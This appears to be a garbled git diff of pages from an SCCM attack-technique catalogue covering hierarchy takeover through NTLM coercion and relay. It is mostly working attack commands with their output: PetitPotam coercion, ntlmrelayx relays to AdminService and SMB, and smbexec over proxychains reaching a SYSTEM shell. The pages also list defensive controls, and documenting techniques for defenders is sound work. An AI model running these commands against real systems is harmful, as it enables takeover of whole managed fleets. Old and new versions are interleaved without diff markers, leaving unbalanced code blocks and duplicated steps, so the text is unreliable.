| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+=========================+============+=================+==============+===================+=====================+===============+========+=========+
| provider.internal.lab | None | False | False | False | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm.internal.lab | LAB | False | True | True | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the URL of the AdminService API on the remote SMS Provider identified in the previous step, and provide a target account to add as a Full Administrator.
```
└─# python3 ntlmrelayx.py --adminservice --logonname "lab\specter" --displayname "lab\specter" --objectsid <USER SID> -smb2support -t https://SMS_PROVIDER_URL_OR_IP/AdminService/wmi/SMS_Admin
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the URL of the AdminService API on the remote SMS Provider identified in the previous step, and provide a target account to add as a Full Administrator:
```
└─# python3 ntlmrelayx.py --adminservice --logonname "lab\specter" --displayname "lab\specter" --objectsid <USER SID> -smb2support -t https://SMS_PROVIDER_URL_OR_IP/AdminService/wmi/SMS_Admin
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
```
3. From the attacker host, coerce NTLM authentication from the site server via SMB, targeting the relay server's IP address:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <SITE_SERVER_IP>
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.100.121[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the AdminService on the SMS Provider to add a Full Administrator:
```
┌──(adminservice)─(root㉿DEKSTOP-2QO0YEUW)-[/opt/adminservice/examples]
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <SITE_SERVER_IP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.100.121, attacking target https://provider.internal.lab
[*] Exiting standard auth flow to add SCCM admin...
[*] Authenticating against https://provider.internal.lab as LAB/SCCM$
[*] Skipping user SCCM$ since attack was already performed
[*] Server returned code 201, attack successful
```
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.100.121[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the AdminService on the SMS Provider to add a Full Administrator:
```
┌──(adminservice)─(root㉿DEKSTOP-2QO0YEUW)-[/opt/adminservice/examples]
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.100.121, attacking target https://provider.internal.lab
[*] Exiting standard auth flow to add SCCM admin...
[*] Authenticating against https://provider.internal.lab as LAB/SCCM$
[*] Skipping user SCCM$ since attack was already performed
[*] Server returned code 201, attack successful
```
4. Confirm that the account now has the `Full Administrator` role by querying WMI on an SMS Provider.
With `sccmhunter`:
4. Confirm that the account now has the `Full Administrator` role by querying WMI on an SMS Provider:
```
$ python3 sccmhunter.py admin -u specter -p <PASSWORD> -ip SITE-SMS
@@ -141,6 +125,7 @@ After a few seconds, you should receive an SMB connection on the relay server th
```
## References
- Garrett Foster, Site Takeover via SCCMs AdminService API, https://posts.specterops.io/site-takeover-via-sccms-adminservice-api-d932e22b2bf
- Microsoft, Plan for the SMS Provider, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/plan-for-the-sms-provider
- Microsoft, What is the administration service in Configuration Manager?, https://learn.microsoft.com/en-us/mem/configmgr/develop/adminservice/overview
- Garrett Foster, [SCCMHunter](https://github.com/garrettfoster13/sccmhunter)
- Garrett Foster, [Site Takeover via SCCM's AdminService API](https://posts.specterops.io/site-takeover-via-sccms-adminservice-api-d932e22b2bf)
- Microsoft, [Plan for the SMS Provider](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/plan-for-the-sms-provider)
- Microsoft, [What is the administration service in Configuration Manager?](https://learn.microsoft.com/en-us/mem/configmgr/develop/adminservice/overview)
@@ -1,99 +0,0 @@
# TAKEOVER-5.2
## Description
Hierarchy Takeover via NTLM Coercion and AdminService Relay From Passive Site Server
## ATT&CK TTPs
- [T1078.002 - Valid Accounts](https://attack.mitre.org/techniques/T1078/002/)
- [T1187 - Forced Authentication](https://attack.mitre.org/techniques/T1187/)
## Required Privilege / Context
Valid domain credentials with network connectivity to the passive primary site server and active primary site server.
## Summary
For high availability configurations the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover. As such, the passive site server also hosts the SMS Provider role.
The SMS Provider is a Windows Management Instrumentation (WMI) provider that performs as an intermediary for accessing and modifying data stored in the site database. Access to the SMS Provider is controlled via membership of the the `SMS Admins` local security group on each site server. The active and passive site server computer accounts are a member of the `SMS Admins` security group on each SMS Provider in a site by default.
The SMS Provider also provides access to the site database via the administration service (adminservice) REST API and uses Microsoft Negotiate for authentication. In default configurations, the adminservice is vulnerable to NTLM relay attacks.
## Impact
This technique may allow an attacker to relay a passive site server machine account to the AdminService hosted on the active site server and elevate their privileges to "Full Administrator" for the SCCM Hierarchy. If successful, this technique enables lateral movement to all SCCM clients and/or sensitive systems.
## Examples
### SCCMHunter
```
[04:24:43 PM] INFO [+] Finished profiling Site Servers.
[04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | SMSProvider | Active | Passive | MSSQL |
+======================+===================+=================+==============+===============+==========+===========+=========+
| sccm.internal.lab | LAB | False | True | True | True | False | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| passive.internal.lab | LAB | False | True | True | False | True | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
```
### PetitPotam
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 passive.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
### NTLMRelayx
```
└─# python3 ntlmrelayx.py --adminservice --logonname "lab\specter" --displayname "lab\specter" --objectsid "S-1-5-21-2391214593-4168590120-2599633397-1133" -smb2support -t https://sccm.internal.lab/AdminService/wmi/SMS_Admin
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.100.141, attacking target https://sccm.internal.lab
[*] Exiting standard auth flow to add SCCM admin...
[*] Authenticating against https://sccm.internal.lab as LAB/PASSIVE$
[*] Adding administrator via SCCM AdminService...
[*] Server returned code 201, attack successful
```
## Defensive IDs
## References
- Garrett Foster, Site Takeover via SCCMs AdminService API, https://posts.specterops.io/site-takeover-via-sccms-adminservice-api-d932e22b2bf
- Microsoft, Plan for the SMS Provider, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/plan-for-the-sms-provider
- Microsoft, What is the administration service in Configuration Manager?, https://learn.microsoft.com/en-us/mem/configmgr/develop/adminservice/overview
@@ -1,4 +1,5 @@
# TAKEOVER-6
## Description
Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider
@@ -18,7 +19,6 @@ Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider
- Coercion target settings:
- `BlockNTLM` = `0` or not present, or = `1` and `BlockNTLMServerExceptionList` contains attacker relay server
- `RestrictSendingNTLMTraffic` = `0`, `1`, or not present, or = `2` and `ClientAllowedNTLMServers` contains attacker relay server
- Domain computer account is not in `Protected Users`
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains coercion target
- `LmCompatibilityLevel` < `5` or not present, or = `5` and LmCompatibilityLevel >= `3` on the coercion target
@@ -32,129 +32,117 @@ Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
The SMS Provider is a SCCM site server role installed by default on the site server when configuring a primary site or central administration site. The role can optionally be installed on additional SCCM site systems for high availability configurations. The SMS Provider is a Windows Management Instrumentation (WMI) provider that performs as an intermediary for accessing and modifying data stored in the site database. An attacker who is able to successfully coerce NTLM authentication from a site server can escalate to "Full Administrator" by elevating to "NT\AUTHORITY SYSTEM" on the SMS Provider.
The SMS Provider is a SCCM site server role installed by default on the site server when configuring a primary site or central administration site. The role can optionally be installed on additional SCCM site systems for high availability configurations. The SMS Provider is a Windows Management Instrumentation (WMI) provider that performs as an intermediary for accessing and modifying data stored in the site database. An attacker who is able to successfully coerce NTLM authentication from a site server can escalate to "Full Administrator" by elevating to "NT\AUTHORITY SYSTEM" on the SMS Provider.
## Impact
This technique may allow an attacker to relay a site server machine account to a remote SMS Provider and elevate their privileges to "Full Administrator" for the SCCM Hierarchy. If successful, this technique enables an attacker to execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on.
This technique may allow an attacker to relay a site server domain computer account to a remote SMS Provider and elevate their privileges to "Full Administrator" for the SCCM Hierarchy. If successful, this technique enables an attacker to execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on.
## Defensive IDs
- [DETECT-4: Monitor SMS Admins group membership](../../../defense-techniques/DETECT/DETECT-4/detect-4_description.md)
## Subtechniques
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-5: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-5/detect-5_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Examples
1. Use `SCCMHunter` to profile SCCM infrastructure:
1. Use `SCCMHunter` to profile SCCM infrastructure.
```
[02:00:25 PM] INFO [+] Finished profiling all discovered computers.
[02:00:25 PM] INFO +-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+=========================+============+=================+==============+===================+=====================+===============+========+=========+
| provider.internal.lab | None | False | False | False | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm.internal.lab | LAB | False | True | True | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service remote SMS Provider identified in the previous step:
```
└─# ntlmrelayx.py -t smb://10.10.100.12 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
```
[02:00:25 PM] INFO [+] Finished profiling all discovered computers.
[02:00:25 PM] INFO +-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+=========================+============+=================+==============+===================+=====================+===============+========+=========+
| provider.internal.lab | None | False | False | False | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm.internal.lab | LAB | False | True | True | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service remote SMS Provider identified in the previous step.
```
└─# ntlmrelayx.py -t smb://10.10.100.12 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] HTTPS Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
```
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] HTTPS Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
```
3. From the attacker host, coerce NTLM authentication from the site server targeting the relay server's IP address:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <SITE_SERVER_IP>
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <SITE_SERVER_IP>
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the SMS provider and the authenticated session is held open
```
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.12
[*] Authenticating against smb://10.10.100.12 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.12(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/SCCM$@10.10.100.12(445)
socks
Protocol Target Username AdminStatus Port
-------- ------------ --------- ----------- ----
SMB 10.10.100.12 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the SMS provider and the authenticated session is held open
4. Proxy `smbexec.py` in the context of the site server through the authenticated session to establish interactive access on the target host as NT\AUTHORITY SYSTEM:
```
└─# proxychains smbexec.py LAB/SCCM\$@10.10.100.12 -codec 437 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.12:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>wmic /namespace:\\root\sms\site_lab path SMS_Admin get AdminID,LogonName
 ■AdminID LogonName
16777217 LAB\Administrator
16777220 LAB\lowpriv
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.12
[*] Authenticating against smb://10.10.100.12 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.12(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/SCCM$@10.10.100.12(445)
socks
Protocol Target Username AdminStatus Port
-------- ------------ --------- ----------- ----
SMB 10.10.100.12 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
4. Proxy `smbexec.py` in the context of the site server through the authenticated session to establish interactive access on the target host as NT\AUTHORITY SYSTEM
```
└─# proxychains smbexec.py LAB/SCCM\$@10.10.100.12 -codec 437 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.12:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>wmic /namespace:\\root\sms\site_lab path SMS_Admin get AdminID,LogonName
 ■AdminID LogonName
16777217 LAB\Administrator
16777220 LAB\lowpriv
C:\Windows\system32>
```
C:\Windows\system32>
```
## References
- Microsoft, Plan for the SMS Provider, https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/plan-for-the-sms-provider
- Garrett Foster, [SCCMHunter](https://github.com/garrettfoster13/sccmhunter)
- Garrett Foster, [Site Takeover via SCCM's AdminService API](https://posts.specterops.io/site-takeover-via-sccms-adminservice-api-d932e22b2bf)
- Microsoft, [Plan for the SMS Provider](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/plan-for-the-sms-provider)
@@ -1,6 +1,7 @@
# TAKEOVER-3
# TAKEOVER-7
## Description
Hierarchy Takeover via NTLM Coercion and Relay from Site Server to SMB
Hierarchy Takeover via NTLM coercion and relay to SMB between primary and passive site servers
## ATT&CK TTPs
- [TA0008](https://attack.mitre.org/tactics/TA0008) - Lateral Movement
@@ -11,14 +12,12 @@ Hierarchy Takeover via NTLM Coercion and Relay from Site Server to SMB
### Coercion
- Valid Active Directory domain credentials
- Connectivity to SMB (TCP/445) on a coercion target:
- TAKEOVER-3.1: Primary site server
- TAKEOVER-3.2: Passive site server
- TAKEOVER-7.1: Coerce primary site server
- TAKEOVER-7.2: Coerce passive site server
- Connectivity from the coercion target to SMB (TCP/445) on the relay server
- Coercion target settings:
- `BlockNTLM` = `0` or not present, or = `1` and `BlockNTLMServerExceptionList` contains attacker relay server
- `RestrictSendingNTLMTraffic` = `0`, `1`, or not present, or = `2` and `ClientAllowedNTLMServers` contains attacker relay server
- Domain computer account is not in `Protected Users`
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains coercion target
- `LmCompatibilityLevel` < `5` or not present, or = `5` and LmCompatibilityLevel >= `3` on the coercion target
@@ -34,184 +33,173 @@ Hierarchy Takeover via NTLM Coercion and Relay from Site Server to SMB
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
For high availability configurations, the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover.
For high availability configurations the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover. During setup, the passive site server is [required](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/site-server-high-availability#configurations-for-the-site-server-in-passive-mode) to be a member of the active site server's local administrator group. An attacker who is able to successfully coerce NTLM authentication from a active or passive site server via SMB and relay it to SMB on a remote active or passive site server to compromise the host can either:
During setup, the passive site server is [required](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/site-server-high-availability#configurations-for-the-site-server-in-passive-mode) to be a member of the active site server's local Administrators group. An attacker who is able to successfully coerce NTLM authentication from a active or passive site server via SMB and relay it to SMB on a remote active or passive site server to compromise the host can either:
1. Authenticate to its own hosted SMS Provider as the site server
2. Authenticate to LDAP(s) as the site server and configure resource-based constrained delegation (RBCD) to impersonate a SCCM Full Administrator
2. Authenticate to LDAP(s) as the site server and configure resource-based constrained delegation (RBCD) to impersonate an SCCM Full Administrator
## Impact
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
## Defensive IDs
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-2/prevent-2_description.md)
- [DETECT-1: Monitor site system computer accounts authenticating from a source that is not its static IP](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-4: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-4/detect-4_description.md)
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-5: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-5/detect-5_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-3.1: NTLM relay primary site server SMB to SMB on passive site server
- TAKEOVER-3.2: NTLM relay passive site server SMB to SMB on primary site server
- TAKEOVER-7.1: Coerce primary site server
- TAKEOVER-7.2: Coerce passive site server
## Examples
The steps to execute TAKEOVER-3.1 and TAKEOVER-3.2 are the same except thE coercion target and relay target are opposite.
The steps to execute TAKEOVER-7.1 and TAKEOVER-7.2 are the same except the coercion target and relay target are opposite. This example is for TAKEOVER-7.1.
1. Use `SCCMHunter` to profile SCCM infrastructure
1. Use `SCCMHunter` to profile SCCM infrastructure:
The results of the `find` module indicate:
- The *SCCM.INTERNAL.LAB* and *PASSIVE.INTERNAL.LAB* sytems are both site servers in the "LAB" site
- The *SCCM.INTERNAL.LAB* host is the active site server and the *PASSIVE.INTERNAL.LAB* host is the passive site server
- SMB signing is disabled on both systems
The results of the `find` module indicate:
- The *SCCM.INTERNAL.LAB* and *PASSIVE.INTERNAL.LAB* sytems are both site servers in the "LAB" site
- The *SCCM.INTERNAL.LAB* host is the active site server and the *PASSIVE.INTERNAL.LAB* host is the passive site server
- SMB signing is disabled on both systems
```
[04:24:43 PM] INFO [+] Finished profiling Site Servers.
[04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | SMSProvider | Active | Passive | MSSQL |
+======================+===================+=================+==============+===============+==========+===========+=========+
| sccm.internal.lab | LAB | False | True | True | True | False | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| passive.internal.lab | LAB | False | True | True | False | True | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service on the primary site server identified in the previous step. The `-socks` flag is used to hold the authenticated session open:
```
└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
```
[04:24:43 PM] INFO [+] Finished profiling Site Servers.
[04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | SMSProvider | Active | Passive | MSSQL |
+======================+===================+=================+==============+===============+==========+===========+=========+
| sccm.internal.lab | LAB | False | True | True | True | False | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| passive.internal.lab | LAB | False | True | True | False | True | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
```
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service on the primary site server identified in the previous step. The `-socks` flag is used to hold the authenticated session open
```
└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
